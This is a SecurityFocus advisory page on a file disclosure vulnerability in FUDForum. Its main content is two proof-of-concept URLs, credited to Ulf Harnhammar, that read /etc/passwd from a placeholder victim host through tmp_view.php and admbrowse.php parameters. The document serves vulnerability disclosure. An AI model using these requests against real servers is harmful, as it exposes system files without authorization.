Search: Home Bugtraq Vulnerabilities Mailing Lists Jobs Tools Beta Programs

Ilia Alshanetsky FUDForum File Disclosure Vulnerability

There is no exploit code required. The following proof of concept was provided by Ulf Harnhammar <ulfh@update.uu.se>:

http://victimhost.com/tmp_view.php?file=/etc/passwd
http://victimhost.com/admbrowse.php?down=1&cur=%2Fetc%2F&dest=passwd&rid=1&S=[someid]







 

Privacy Statement
Copyright 2008, SecurityFocus